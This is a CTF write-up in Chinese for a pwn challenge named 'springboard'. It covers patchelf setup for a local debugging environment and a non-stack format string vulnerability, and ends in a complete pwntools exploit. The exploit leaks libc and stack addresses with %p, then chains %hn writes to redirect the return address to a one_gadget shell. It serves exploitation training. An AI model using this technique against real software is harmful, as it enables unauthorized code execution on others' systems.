springboard

本地环境调试

之前一直不理解为什么有的题目会给几个文件,现在才知道可以用来方便协调本地和远程的环境的

这里需要使用patchelf这个工具

修改ld

1
patchelf --set-interpreter ./ld.so ./pwn(路径和文件)

ld.so 是要修改的 ./pwn是本地文件名

修改libc

1
patchelf --replace-needed libc.so.6 ./libc.so.6 ./pwn

解题思路

检查

1

2

可以看出非栈上格式化字符串漏洞

来到printf函数

3

可以看到

1处可以泄露libc 同时也是返回地址的所在地

两个2处可以利用这样的链式关系修改任意位置的地址

具体的手搓格式化字符串点这里格式化字符串 | 鱼非愚 (yufeiyu33.github.io)

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
from pwn import *
from ctypes import *

s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
r       = lambda num                :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
itr     = lambda                    :p.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
l64     = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
l32     = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,b"\x00"))
#context.terminal = ['gnome-terminal','-x','sh','-c']
context(os='linux',arch='amd64',log_level='debug')
#p=remote('node5.buuoj.cn',25630)
p=process('./pwn')
elf = ELF('./pwn')
libc = ELF('libc.so.6')

def duan():
    gdb.attach(p)
    pause()

ru('Please enter a keyword\n')
#duan()
sl('%9$p-%11$p')
ru('0x')
libc_leak=int(r(12),16)
libc_base=libc_leak-libc.sym['__libc_start_main']-240#remote 240
leak('libc_leak',libc_leak)
leak('libc_base ',libc_base)

ru('-0x')
stack=int(r(12),16)
leak('stack ',stack)
stack1=stack-224
leak('stack1 ',stack1)
leak('stack1&0xffff ',stack1&0xffff)
ogs=[0x45226,0x4527a,0xf03a4,0xf1247]
og=libc_base+ogs[0]
leak('og',og)

leak('og&0xffff',og&0xffff)
leak('(og>>16)&0xff',(og>>16)&0xff)
duan()
sla('Please enter a keyword','%'+str(stack1&0xffff)+'c%11$hn')


pause()
sla('Please enter a keyword','%'+str(og&0xffff)+'c%37$hn')
sla('Please enter a keyword','%'+str((stack1+2)&0xffff)+'c%11$hn')
sla('Please enter a keyword','%'+str((og>>16)&0xff)+'c%37$hhn')
'''
sla('Please enter a keyword','%'+str(stack1&0xffff)+'c%11$hn')
sla('Please enter a keyword','%'+str(og&0xffff)+'c%37$hn')
sla('Please enter a keyword','%'+str((stack1+2)&0xffff)+'c%11$hn')
sla('Please enter a keyword','%'+str((og>>16)&0xff)+'c%37$hhn')


'''

itr()